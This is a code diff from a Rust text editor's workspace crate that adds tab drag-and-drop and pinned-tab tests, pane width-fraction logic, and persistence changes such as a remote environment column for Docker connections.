@@ -4825,19 +4922,81 @@ impl Render for DraggedTab { #[cfg(test)] mod tests { - use std::{iter::zip, num::NonZero}; + use std::{cell::Cell, iter::zip, num::NonZero, rc::Rc}; use super::*; use crate::{ Member, item::test::{TestItem, TestProjectItem}, }; - use gpui::{AppContext, Axis, TestAppContext, VisualTestContext, size}; + use gpui::{ + AppContext, Axis, Modifiers, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, + TestAppContext, VisualTestContext, size, + }; use project::FakeFs; use settings::SettingsStore; use theme::LoadThemes; use util::TryFutureExt; + // drop_call_count is a Cell here because `handle_drop` takes &self, not &mut self. + struct CustomDropHandlingItem { + focus_handle: gpui::FocusHandle, + drop_call_count: Cell, + } + + impl CustomDropHandlingItem { + fn new(cx: &mut Context) -> Self { + Self { + focus_handle: cx.focus_handle(), + drop_call_count: Cell::new(0), + } + } + + fn drop_call_count(&self) -> usize { + self.drop_call_count.get() + } + } + + impl EventEmitter<()> for CustomDropHandlingItem {} + + impl Focusable for CustomDropHandlingItem { + fn focus_handle(&self, _cx: &App) -> gpui::FocusHandle { + self.focus_handle.clone() + } + } + + impl Render for CustomDropHandlingItem { + fn render( + &mut self, + _window: &mut Window, + _cx: &mut Context, + ) -> impl gpui::IntoElement { + gpui::Empty + } + } + + impl Item for CustomDropHandlingItem { + type Event = (); + + fn tab_content_text(&self, _detail: usize, _cx: &App) -> gpui::SharedString { + "custom_drop_handling_item".into() + } + + fn handle_drop( + &self, + _active_pane: &Pane, + dropped: &dyn std::any::Any, + _window: &mut Window, + _cx: &mut App, + ) -> bool { + let is_dragged_tab = dropped.downcast_ref::().is_some(); + if is_dragged_tab { + self.drop_call_count.set(self.drop_call_count.get() + 1); + } + is_dragged_tab + } + } + #[gpui::test] async fn test_add_item_capped_to_max_tabs(cx: &mut TestAppContext) { init_test(cx); @@ -5663,6 +5822,83 @@ mod tests { 
assert_item_labels(&pane, ["C", "A", "B*"], cx); } + #[gpui::test] + async fn test_handle_tab_drop_respects_is_pane_target(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + let project = Project::test(fs, None, cx).await; + let (workspace, cx) = + cx.add_window_view(|window, cx| Workspace::test_new(project.clone(), window, cx)); + let source_pane = workspace.read_with(cx, |workspace, _| workspace.active_pane().clone()); + + let item_a = add_labeled_item(&source_pane, "A", false, cx); + let item_b = add_labeled_item(&source_pane, "B", false, cx); + + let target_pane = workspace.update_in(cx, |workspace, window, cx| { + workspace.split_pane(source_pane.clone(), SplitDirection::Right, window, cx) + }); + + let custom_item = target_pane.update_in(cx, |pane, window, cx| { + let custom_item = Box::new(cx.new(CustomDropHandlingItem::new)); + pane.add_item(custom_item.clone(), true, true, None, window, cx); + custom_item + }); + + let moved_item_id = item_a.item_id(); + let other_item_id = item_b.item_id(); + let custom_item_id = custom_item.item_id(); + + let pane_item_ids = |pane: &Entity, cx: &mut VisualTestContext| { + pane.read_with(cx, |pane, _| { + pane.items().map(|item| item.item_id()).collect::>() + }) + }; + + let source_before_item_ids = pane_item_ids(&source_pane, cx); + assert_eq!(source_before_item_ids, vec![moved_item_id, other_item_id]); + + let target_before_item_ids = pane_item_ids(&target_pane, cx); + assert_eq!(target_before_item_ids, vec![custom_item_id]); + + let dragged_tab = DraggedTab { + pane: source_pane.clone(), + item: item_a.boxed_clone(), + ix: 0, + detail: 0, + is_active: true, + }; + + // Dropping item_a onto the target pane itself means the + // custom item handles the drop and no tab move should occur + target_pane.update_in(cx, |pane, window, cx| { + pane.handle_tab_drop(&dragged_tab, pane.active_item_index(), true, window, cx); + }); + cx.run_until_parked(); + + assert_eq!( + custom_item.read_with(cx, 
|item, _| item.drop_call_count()), + 1 + ); + assert_eq!(pane_item_ids(&source_pane, cx), source_before_item_ids); + assert_eq!(pane_item_ids(&target_pane, cx), target_before_item_ids); + + // Dropping item_a onto the tab target means the custom handler + // should be skipped and the pane's default tab drop behavior should run. + target_pane.update_in(cx, |pane, window, cx| { + pane.handle_tab_drop(&dragged_tab, pane.active_item_index(), false, window, cx); + }); + cx.run_until_parked(); + + assert_eq!( + custom_item.read_with(cx, |item, _| item.drop_call_count()), + 1 + ); + assert_eq!(pane_item_ids(&source_pane, cx), vec![other_item_id]); + + let target_item_ids = pane_item_ids(&target_pane, cx); + assert_eq!(target_item_ids, vec![moved_item_id, custom_item_id]); + } + #[gpui::test] async fn test_drag_unpinned_tab_to_split_creates_pane_with_unpinned_tab( cx: &mut TestAppContext, @@ -5698,7 +5934,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 0, window, cx); + pane.handle_tab_drop(&dragged_tab, 0, true, window, cx); }); // A should be moved to new pane. B should remain pinned, A should not be pinned @@ -5747,7 +5983,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 0, window, cx); + pane.handle_tab_drop(&dragged_tab, 0, true, window, cx); }); // A should be moved to new pane. 
Both A and B should still be pinned @@ -5797,7 +6033,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 0, window, cx); + pane.handle_tab_drop(&dragged_tab, 0, false, window, cx); }); // A should stay pinned @@ -5845,7 +6081,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 1, window, cx); + pane.handle_tab_drop(&dragged_tab, 1, false, window, cx); }); // A should become pinned @@ -5889,7 +6125,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 0, window, cx); + pane.handle_tab_drop(&dragged_tab, 0, false, window, cx); }); // A should stay pinned @@ -5951,7 +6187,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 0, window, cx); + pane.handle_tab_drop(&dragged_tab, 0, false, window, cx); }); // E (unpinned) should be closed, leaving 3 pinned items @@ -5986,7 +6222,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 1, window, cx); + pane.handle_tab_drop(&dragged_tab, 1, false, window, cx); }); // A should still be pinned and active @@ -6026,7 +6262,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 2, window, cx); + pane.handle_tab_drop(&dragged_tab, 2, false, window, cx); }); // A stays pinned @@ -6063,7 +6299,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 1, window, cx); + pane.handle_tab_drop(&dragged_tab, 1, false, window, cx); }); // Neither are pinned @@ -6100,7 +6336,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 2, window, cx); + pane.handle_tab_drop(&dragged_tab, 2, false, window, cx); }); // A becomes unpinned @@ -6137,7 +6373,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 0, window, cx); + pane.handle_tab_drop(&dragged_tab, 0, false, window, cx); }); // A becomes unpinned @@ -6173,7 +6409,7 @@ mod tests { detail: 0, is_active: true, }; - 
pane.handle_tab_drop(&dragged_tab, 1, window, cx); + pane.handle_tab_drop(&dragged_tab, 1, false, window, cx); }); // A stays pinned, B and C remain unpinned @@ -6214,7 +6450,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 0, window, cx); + pane.handle_tab_drop(&dragged_tab, 0, false, window, cx); }); // A should become pinned since it was dropped in the pinned region @@ -6256,7 +6492,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 1, window, cx); + pane.handle_tab_drop(&dragged_tab, 1, true, window, cx); }); // A should remain unpinned since it was dropped outside the pinned region @@ -6303,7 +6539,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 1, window, cx); + pane.handle_tab_drop(&dragged_tab, 1, false, window, cx); }); // A should be after B and all are pinned @@ -6318,7 +6554,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 2, window, cx); + pane.handle_tab_drop(&dragged_tab, 2, false, window, cx); }); // A should be after C and all are pinned @@ -6333,7 +6569,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 1, window, cx); + pane.handle_tab_drop(&dragged_tab, 1, false, window, cx); }); // A should be before C and all are pinned @@ -6348,7 +6584,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 0, window, cx); + pane.handle_tab_drop(&dragged_tab, 0, false, window, cx); }); // A should be before B and all are pinned @@ -6380,7 +6616,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 2, window, cx); + pane.handle_tab_drop(&dragged_tab, 2, false, window, cx); }); // A should be at the end @@ -6412,7 +6648,7 @@ mod tests { detail: 0, is_active: true, }; - pane.handle_tab_drop(&dragged_tab, 0, window, cx); + pane.handle_tab_drop(&dragged_tab, 0, false, window, cx); }); // C should be at the beginning @@ -6421,8 
+6657,6 @@ mod tests { #[gpui::test] async fn test_drag_tab_to_middle_tab_with_mouse_events(cx: &mut TestAppContext) { - use gpui::{Modifiers, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent}; - init_test(cx); let fs = FakeFs::new(cx.executor()); @@ -6474,8 +6708,6 @@ mod tests { async fn test_drag_pinned_tab_when_show_pinned_tabs_in_separate_row_enabled( cx: &mut TestAppContext, ) { - use gpui::{Modifiers, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent}; - init_test(cx); set_pinned_tabs_separate_row(cx, true); let fs = FakeFs::new(cx.executor()); @@ -6551,8 +6783,6 @@ mod tests { async fn test_drag_unpinned_tab_when_show_pinned_tabs_in_separate_row_enabled( cx: &mut TestAppContext, ) { - use gpui::{Modifiers, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent}; - init_test(cx); set_pinned_tabs_separate_row(cx, true); let fs = FakeFs::new(cx.executor()); @@ -6605,8 +6835,6 @@ mod tests { async fn test_drag_mixed_tabs_when_show_pinned_tabs_in_separate_row_enabled( cx: &mut TestAppContext, ) { - use gpui::{Modifiers, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent}; - init_test(cx); set_pinned_tabs_separate_row(cx, true); let fs = FakeFs::new(cx.executor()); @@ -6670,6 +6898,145 @@ mod tests { assert_item_labels(&pane, ["A!", "B!", "D", "E", "C*", "F"], cx); } + #[gpui::test] + async fn test_middle_click_pinned_tab_does_not_close(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + let project = Project::test(fs, None, cx).await; + let (workspace, cx) = + cx.add_window_view(|window, cx| Workspace::test_new(project.clone(), window, cx)); + let pane = workspace.read_with(cx, |workspace, _| workspace.active_pane().clone()); + + let item_a = add_labeled_item(&pane, "A", false, cx); + add_labeled_item(&pane, "B", false, cx); + + pane.update_in(cx, |pane, window, cx| { + pane.pin_tab_at( + pane.index_for_item_id(item_a.item_id()).unwrap(), + window, + cx, + ); + }); + assert_item_labels(&pane, ["A!", 
"B*"], cx); + cx.run_until_parked(); + + let tab_a_bounds = cx + .debug_bounds("TAB-0") + .expect("Tab A (index 1) should have debug bounds"); + let tab_b_bounds = cx + .debug_bounds("TAB-1") + .expect("Tab B (index 2) should have debug bounds"); + + cx.simulate_event(MouseDownEvent { + position: tab_a_bounds.center(), + button: MouseButton::Middle, + modifiers: Modifiers::default(), + click_count: 1, + first_mouse: false, + }); + + cx.run_until_parked(); + + cx.simulate_event(MouseUpEvent { + position: tab_a_bounds.center(), + button: MouseButton::Middle, + modifiers: Modifiers::default(), + click_count: 1, + }); + + cx.run_until_parked(); + + cx.simulate_event(MouseDownEvent { + position: tab_b_bounds.center(), + button: MouseButton::Middle, + modifiers: Modifiers::default(), + click_count: 1, + first_mouse: false, + }); + + cx.run_until_parked(); + + cx.simulate_event(MouseUpEvent { + position: tab_b_bounds.center(), + button: MouseButton::Middle, + modifiers: Modifiers::default(), + click_count: 1, + }); + + cx.run_until_parked(); + + assert_item_labels(&pane, ["A*!"], cx); + } + + #[gpui::test] + async fn test_double_click_pinned_tab_bar_empty_space_creates_new_tab(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + let project = Project::test(fs, None, cx).await; + let (workspace, cx) = + cx.add_window_view(|window, cx| Workspace::test_new(project.clone(), window, cx)); + let pane = workspace.read_with(cx, |workspace, _| workspace.active_pane().clone()); + + // The real NewFile handler lives in editor::init, which isn't initialized + // in workspace tests. Register a global action handler that sets a flag so + // we can verify the action is dispatched without depending on the editor crate. + // TODO: If editor::init is ever available in workspace tests, remove this + // flag and assert the resulting tab bar state directly instead. 
+ let new_file_dispatched = Rc::new(Cell::new(false)); + cx.update(|_, cx| { + let new_file_dispatched = new_file_dispatched.clone(); + cx.on_action(move |_: &NewFile, _cx| { + new_file_dispatched.set(true); + }); + }); + + set_pinned_tabs_separate_row(cx, true); + + let item_a = add_labeled_item(&pane, "A", false, cx); + add_labeled_item(&pane, "B", false, cx); + + pane.update_in(cx, |pane, window, cx| { + let ix = pane + .index_for_item_id(item_a.item_id()) + .expect("item A should exist"); + pane.pin_tab_at(ix, window, cx); + }); + assert_item_labels(&pane, ["A!", "B*"], cx); + cx.run_until_parked(); + + let pinned_drop_target_bounds = cx + .debug_bounds("pinned_tabs_border") + .expect("pinned_tabs_border should have debug bounds"); + + cx.simulate_event(MouseDownEvent { + position: pinned_drop_target_bounds.center(), + button: MouseButton::Left, + modifiers: Modifiers::default(), + click_count: 2, + first_mouse: false, + }); + + cx.run_until_parked(); + + cx.simulate_event(MouseUpEvent { + position: pinned_drop_target_bounds.center(), + button: MouseButton::Left, + modifiers: Modifiers::default(), + click_count: 2, + }); + + cx.run_until_parked(); + + // TODO: If editor::init is ever available in workspace tests, replace this + // with an assert_item_labels check that verifies a new tab is actually created. 
+ assert!( + new_file_dispatched.get(), + "Double-clicking pinned tab bar empty space should dispatch the new file action" + ); + } + #[gpui::test] async fn test_add_item_with_new_item(cx: &mut TestAppContext) { init_test(cx); @@ -7935,6 +8302,71 @@ mod tests { ); } + #[gpui::test] + async fn test_pinned_tabs_scroll_to_item_uses_correct_index(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + let project = Project::test(fs, None, cx).await; + let (workspace, cx) = + cx.add_window_view(|window, cx| Workspace::test_new(project, window, cx)); + let pane = workspace.read_with(cx, |workspace, _| workspace.active_pane().clone()); + + cx.simulate_resize(size(px(400.), px(300.))); + + for label in ["A", "B", "C"] { + add_labeled_item(&pane, label, false, cx); + } + + pane.update_in(cx, |pane, window, cx| { + pane.pin_tab_at(0, window, cx); + pane.pin_tab_at(1, window, cx); + pane.pin_tab_at(2, window, cx); + }); + + for label in ["D", "E", "F", "G", "H", "I", "J", "K"] { + add_labeled_item(&pane, label, false, cx); + } + + assert_item_labels( + &pane, + ["A!", "B!", "C!", "D", "E", "F", "G", "H", "I", "J", "K*"], + cx, + ); + + cx.run_until_parked(); + + // Verify overflow exists (precondition for scroll test) + let scroll_handle = + pane.update_in(cx, |pane, _window, _cx| pane.tab_bar_scroll_handle.clone()); + assert!( + scroll_handle.max_offset().x > px(0.), + "Test requires tab overflow to verify scrolling. Increase tab count or reduce window width." 
+ ); + + // Activate a different tab first, then activate K + // This ensures we're not just re-activating an already-active tab + pane.update_in(cx, |pane, window, cx| { + pane.activate_item(3, true, true, window, cx); + }); + cx.run_until_parked(); + + pane.update_in(cx, |pane, window, cx| { + pane.activate_item(10, true, true, window, cx); + }); + cx.run_until_parked(); + + let scroll_handle = + pane.update_in(cx, |pane, _window, _cx| pane.tab_bar_scroll_handle.clone()); + let k_tab_bounds = cx.debug_bounds("TAB-10").unwrap(); + let scroll_bounds = scroll_handle.bounds(); + + assert!( + k_tab_bounds.left() >= scroll_bounds.left(), + "Active tab K should be scrolled into view" + ); + } + #[gpui::test] async fn test_close_all_items_including_pinned(cx: &mut TestAppContext) { init_test(cx); @@ -8258,11 +8690,56 @@ mod tests { ); } + #[gpui::test] + async fn test_activate_item_with_wrap_around(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + let project = Project::test(fs, None, cx).await; + let (workspace, cx) = + cx.add_window_view(|window, cx| Workspace::test_new(project.clone(), window, cx)); + let pane = workspace.read_with(cx, |workspace, _| workspace.active_pane().clone()); + + add_labeled_item(&pane, "A", false, cx); + add_labeled_item(&pane, "B", false, cx); + add_labeled_item(&pane, "C", false, cx); + assert_item_labels(&pane, ["A", "B", "C*"], cx); + + pane.update_in(cx, |pane, window, cx| { + pane.activate_next_item(&ActivateNextItem { wrap_around: false }, window, cx); + }); + assert_item_labels(&pane, ["A", "B", "C*"], cx); + + pane.update_in(cx, |pane, window, cx| { + pane.activate_next_item(&ActivateNextItem::default(), window, cx); + }); + assert_item_labels(&pane, ["A*", "B", "C"], cx); + + pane.update_in(cx, |pane, window, cx| { + pane.activate_previous_item(&ActivatePreviousItem { wrap_around: false }, window, cx); + }); + assert_item_labels(&pane, ["A*", "B", "C"], cx); + + pane.update_in(cx, |pane, window, 
cx| { + pane.activate_previous_item(&ActivatePreviousItem::default(), window, cx); + }); + assert_item_labels(&pane, ["A", "B", "C*"], cx); + + pane.update_in(cx, |pane, window, cx| { + pane.activate_previous_item(&ActivatePreviousItem { wrap_around: false }, window, cx); + }); + assert_item_labels(&pane, ["A", "B*", "C"], cx); + + pane.update_in(cx, |pane, window, cx| { + pane.activate_next_item(&ActivateNextItem { wrap_around: false }, window, cx); + }); + assert_item_labels(&pane, ["A", "B", "C*"], cx); + } + fn init_test(cx: &mut TestAppContext) { cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); - theme::init(LoadThemes::JustBase, cx); + theme_settings::init(LoadThemes::JustBase, cx); }); } diff --git a/crates/workspace/src/pane_group.rs b/crates/workspace/src/pane_group.rs index 0921a19486718c5375ed17ebbb3d7e314546f8d7..c5f78eef6c4a7403589cb4e947326f9fe87ec610 100644 --- a/crates/workspace/src/pane_group.rs +++ b/crates/workspace/src/pane_group.rs @@ -1,6 +1,7 @@ use crate::{ AnyActiveCall, AppState, CollaboratorId, FollowerState, Pane, ParticipantLocation, Workspace, WorkspaceSettings, + notifications::DetachAndPromptErr, pane_group::element::pane_axis, workspace_settings::{PaneSplitDirectionHorizontal, PaneSplitDirectionVertical}, }; @@ -97,6 +98,10 @@ impl PaneGroup { } } + pub fn width_fraction_for_pane(&self, pane: &Entity) -> Option { + self.root.width_fraction_for_pane(pane) + } + pub fn pane_at_pixel_position(&self, coordinate: Point) -> Option<&Entity> { match &self.root { Member::Pane(pane) => Some(pane), @@ -301,6 +306,13 @@ impl Member { }), } } + + fn width_fraction_for_pane(&self, pane: &Entity) -> Option { + match self { + Member::Pane(found) => (found == pane).then_some(1.0), + Member::Axis(axis) => axis.width_fraction_for_pane(pane), + } + } } #[derive(Clone, Copy)] @@ -427,14 +439,19 @@ impl PaneLeaderDecorator for PaneRenderContext<'_> { let app_state = self.app_state.clone(); 
this.cursor_pointer().on_mouse_down( MouseButton::Left, - move |_, _, cx| { + move |_, window, cx| { crate::join_in_room_project( leader_project_id, leader_user_id, app_state.clone(), cx, ) - .detach_and_log_err(cx); + .detach_and_prompt_err( + "Failed to join project", + window, + cx, + |error, _, _| Some(format!("{error:#}")), + ); }, ) }, @@ -884,6 +901,40 @@ impl PaneAxis { None } + fn width_fraction_for_pane(&self, pane: &Entity) -> Option { + let flexes = self.flexes.lock(); + let total_flex = flexes.iter().copied().sum::(); + + for (index, member) in self.members.iter().enumerate() { + let child_fraction = if total_flex > 0.0 { + flexes[index] / total_flex + } else { + 1.0 / self.members.len() as f32 + }; + + match member { + Member::Pane(found) => { + if found == pane { + return Some(match self.axis { + Axis::Horizontal => child_fraction, + Axis::Vertical => 1.0, + }); + } + } + Member::Axis(axis) => { + if let Some(descendant_fraction) = axis.width_fraction_for_pane(pane) { + return Some(match self.axis { + Axis::Horizontal => child_fraction * descendant_fraction, + Axis::Vertical => descendant_fraction, + }); + } + } + } + } + + None + } + fn render( &self, basis: usize, diff --git a/crates/workspace/src/persistence.rs b/crates/workspace/src/persistence.rs index 492b7a8f385730feaa06dfe3b5e8b4cc0a20bb59..2994e9d0f67d73a30838f922c9b6a0b01b21ed14 100644 --- a/crates/workspace/src/persistence.rs +++ b/crates/workspace/src/persistence.rs @@ -14,7 +14,7 @@ use fs::Fs; use anyhow::{Context as _, Result, bail}; use collections::{HashMap, HashSet, IndexSet}; use db::{ - kvp::KEY_VALUE_STORE, + kvp::KeyValueStore, query, sqlez::{connection::Connection, domain::Domain}, sqlez_macros::sql, @@ -174,8 +174,8 @@ impl Column for SerializedWindowBounds { const DEFAULT_WINDOW_BOUNDS_KEY: &str = "default_window_bounds"; -pub fn read_default_window_bounds() -> Option<(Uuid, WindowBounds)> { - let json_str = KEY_VALUE_STORE +pub fn read_default_window_bounds(kvp: 
&KeyValueStore) -> Option<(Uuid, WindowBounds)> { + let json_str = kvp .read_kvp(DEFAULT_WINDOW_BOUNDS_KEY) .log_err() .flatten()?; @@ -186,13 +186,13 @@ pub fn read_default_window_bounds() -> Option<(Uuid, WindowBounds)> { } pub async fn write_default_window_bounds( + kvp: &KeyValueStore, bounds: WindowBounds, display_uuid: Uuid, ) -> anyhow::Result<()> { let persisted = WindowBoundsJson::from(bounds); let json_str = serde_json::to_string(&(display_uuid, persisted))?; - KEY_VALUE_STORE - .write_kvp(DEFAULT_WINDOW_BOUNDS_KEY.to_string(), json_str) + kvp.write_kvp(DEFAULT_WINDOW_BOUNDS_KEY.to_string(), json_str) .await?; Ok(()) } @@ -290,12 +290,9 @@ impl From for WindowBounds { } } -fn multi_workspace_states() -> db::kvp::ScopedKeyValueStore<'static> { - KEY_VALUE_STORE.scoped("multi_workspace_state") -} - -fn read_multi_workspace_state(window_id: WindowId) -> model::MultiWorkspaceState { - multi_workspace_states() +fn read_multi_workspace_state(window_id: WindowId, cx: &App) -> model::MultiWorkspaceState { + let kvp = KeyValueStore::global(cx); + kvp.scoped("multi_workspace_state") .read(&window_id.as_u64().to_string()) .log_err() .flatten() @@ -303,9 +300,13 @@ fn read_multi_workspace_state(window_id: WindowId) -> model::MultiWorkspaceState .unwrap_or_default() } -pub async fn write_multi_workspace_state(window_id: WindowId, state: model::MultiWorkspaceState) { +pub async fn write_multi_workspace_state( + kvp: &KeyValueStore, + window_id: WindowId, + state: model::MultiWorkspaceState, +) { if let Ok(json_str) = serde_json::to_string(&state) { - multi_workspace_states() + kvp.scoped("multi_workspace_state") .write(window_id.as_u64().to_string(), json_str) .await .log_err(); @@ -314,6 +315,7 @@ pub async fn write_multi_workspace_state(window_id: WindowId, state: model::Mult pub fn read_serialized_multi_workspaces( session_workspaces: Vec, + cx: &App, ) -> Vec { let mut window_groups: Vec> = Vec::new(); let mut window_id_to_group: HashMap = HashMap::default(); @@ 
-335,34 +337,38 @@ pub fn read_serialized_multi_workspaces( window_groups .into_iter() - .map(|group| { + .filter_map(|group| { let window_id = group.first().and_then(|sw| sw.window_id); let state = window_id - .map(read_multi_workspace_state) + .map(|wid| read_multi_workspace_state(wid, cx)) .unwrap_or_default(); - model::SerializedMultiWorkspace { - workspaces: group, + let active_workspace = state + .active_workspace_id + .and_then(|id| group.iter().position(|ws| ws.workspace_id == id)) + .or(Some(0)) + .and_then(|index| group.into_iter().nth(index))?; + Some(model::SerializedMultiWorkspace { + active_workspace, state, - } + }) }) .collect() } const DEFAULT_DOCK_STATE_KEY: &str = "default_dock_state"; -pub fn read_default_dock_state() -> Option { - let json_str = KEY_VALUE_STORE - .read_kvp(DEFAULT_DOCK_STATE_KEY) - .log_err() - .flatten()?; +pub fn read_default_dock_state(kvp: &KeyValueStore) -> Option { + let json_str = kvp.read_kvp(DEFAULT_DOCK_STATE_KEY).log_err().flatten()?; serde_json::from_str::(&json_str).ok() } -pub async fn write_default_dock_state(docks: DockStructure) -> anyhow::Result<()> { +pub async fn write_default_dock_state( + kvp: &KeyValueStore, + docks: DockStructure, +) -> anyhow::Result<()> { let json_str = serde_json::to_string(&docks)?; - KEY_VALUE_STORE - .write_kvp(DEFAULT_DOCK_STATE_KEY.to_string(), json_str) + kvp.write_kvp(DEFAULT_DOCK_STATE_KEY.to_string(), json_str) .await?; Ok(()) } @@ -970,6 +976,9 @@ impl Domain for WorkspaceDb { sql!( ALTER TABLE remote_connections ADD COLUMN use_podman BOOLEAN; ), + sql!( + ALTER TABLE remote_connections ADD COLUMN remote_env TEXT; + ), ]; // Allow recovering from bad migration that was initially shipped to nightly @@ -980,7 +989,7 @@ impl Domain for WorkspaceDb { } } -db::static_connection!(DB, WorkspaceDb, []); +db::static_connection!(WorkspaceDb, []); impl WorkspaceDb { /// Returns a serialized workspace for the given worktree_roots. 
If the passed array @@ -1499,6 +1508,7 @@ impl WorkspaceDb { let mut name = None; let mut container_id = None; let mut use_podman = None; + let mut remote_env = None; match options { RemoteConnectionOptions::Ssh(options) => { kind = RemoteConnectionKind::Ssh; @@ -1517,6 +1527,7 @@ impl WorkspaceDb { name = Some(options.name); use_podman = Some(options.use_podman); user = Some(options.remote_user); + remote_env = serde_json::to_string(&options.remote_env).ok(); } #[cfg(any(test, feature = "test-support"))] RemoteConnectionOptions::Mock(options) => { @@ -1535,6 +1546,7 @@ impl WorkspaceDb { name, container_id, use_podman, + remote_env, ) } @@ -1548,6 +1560,7 @@ impl WorkspaceDb { name: Option, container_id: Option, use_podman: Option, + remote_env: Option, ) -> Result { if let Some(id) = this.select_row_bound(sql!( SELECT id @@ -1581,8 +1594,9 @@ impl WorkspaceDb { distro, name, container_id, - use_podman - ) VALUES (?1, ?2, ?3, ?4, ?5, ?6, ?7, ?8) + use_podman, + remote_env + ) VALUES (?1, ?2, ?3, ?4, ?5, ?6, ?7, ?8, ?9) RETURNING id ))?(( kind.serialize(), @@ -1593,6 +1607,7 @@ impl WorkspaceDb { name, container_id, use_podman, + remote_env, ))? .context("failed to insert remote project")?; Ok(RemoteConnectionId(id)) @@ -1694,13 +1709,13 @@ impl WorkspaceDb { fn remote_connections(&self) -> Result> { Ok(self.select(sql!( SELECT - id, kind, host, port, user, distro, container_id, name, use_podman + id, kind, host, port, user, distro, container_id, name, use_podman, remote_env FROM remote_connections ))?()? 
.into_iter() .filter_map( - |(id, kind, host, port, user, distro, container_id, name, use_podman)| { + |(id, kind, host, port, user, distro, container_id, name, use_podman, remote_env)| { Some(( RemoteConnectionId(id), Self::remote_connection_from_row( @@ -1712,6 +1727,7 @@ impl WorkspaceDb { container_id, name, use_podman, + remote_env, )?, )) }, @@ -1723,9 +1739,9 @@ impl WorkspaceDb { &self, id: RemoteConnectionId, ) -> Result { - let (kind, host, port, user, distro, container_id, name, use_podman) = + let (kind, host, port, user, distro, container_id, name, use_podman, remote_env) = self.select_row_bound(sql!( - SELECT kind, host, port, user, distro, container_id, name, use_podman + SELECT kind, host, port, user, distro, container_id, name, use_podman, remote_env FROM remote_connections WHERE id = ? ))?(id.0)? @@ -1739,6 +1755,7 @@ impl WorkspaceDb { container_id, name, use_podman, + remote_env, ) .context("invalid remote_connection row") } @@ -1752,6 +1769,7 @@ impl WorkspaceDb { container_id: Option, name: Option, use_podman: Option, + remote_env: Option, ) -> Option { match RemoteConnectionKind::deserialize(&kind)? 
{ RemoteConnectionKind::Wsl => Some(RemoteConnectionOptions::Wsl(WslConnectionOptions { @@ -1765,12 +1783,15 @@ impl WorkspaceDb { ..Default::default() })), RemoteConnectionKind::Docker => { + let remote_env: BTreeMap = + serde_json::from_str(&remote_env?).ok()?; Some(RemoteConnectionOptions::Docker(DockerConnectionOptions { container_id: container_id?, name: name?, remote_user: user?, upload_binary_over_docker_exec: false, use_podman: use_podman?, + remote_env, })) } } @@ -1783,11 +1804,17 @@ impl WorkspaceDb { } } - async fn all_paths_exist_with_a_directory(paths: &[PathBuf], fs: &dyn Fs) -> bool { + async fn all_paths_exist_with_a_directory( + paths: &[PathBuf], + fs: &dyn Fs, + timestamp: Option>, + ) -> bool { let mut any_dir = false; for path in paths { match fs.metadata(path).await.ok().flatten() { - None => return false, + None => { + return timestamp.is_some_and(|t| Utc::now() - t < chrono::Duration::days(7)); + } Some(meta) => { if meta.is_dir { any_dir = true; @@ -1843,7 +1870,9 @@ impl WorkspaceDb { // If a local workspace points to WSL, this check will cause us to wait for the // WSL VM and file server to boot up. This can block for many seconds. // Supported scenarios use remote workspaces. 
- if !has_wsl_path && Self::all_paths_exist_with_a_directory(paths.paths(), fs).await { + if !has_wsl_path + && Self::all_paths_exist_with_a_directory(paths.paths(), fs, Some(timestamp)).await + { result.push((id, SerializedWorkspaceLocation::Local, paths, timestamp)); } else { delete_tasks.push(self.delete_workspace_by_id(id)); @@ -1903,7 +1932,7 @@ impl WorkspaceDb { window_id, }); } else { - if Self::all_paths_exist_with_a_directory(paths.paths(), fs).await { + if Self::all_paths_exist_with_a_directory(paths.paths(), fs, None).await { workspaces.push(SessionWorkspace { workspace_id, location: SerializedWorkspaceLocation::Local, @@ -2244,7 +2273,7 @@ impl WorkspaceDb { use db::sqlez::statement::Statement; use itertools::Itertools as _; - DB.clear_trusted_worktrees() + self.clear_trusted_worktrees() .await .context("clearing previous trust state")?; @@ -2311,7 +2340,7 @@ VALUES {placeholders};"# } pub fn fetch_trusted_worktrees(&self) -> Result { - let trusted_worktrees = DB.trusted_worktrees()?; + let trusted_worktrees = self.trusted_worktrees()?; Ok(trusted_worktrees .into_iter() .filter_map(|(abs_path, user_name, host_name)| { @@ -2350,6 +2379,86 @@ VALUES {placeholders};"# } } +type WorkspaceEntry = ( + WorkspaceId, + SerializedWorkspaceLocation, + PathList, + DateTime, +); + +/// Resolves workspace entries whose paths 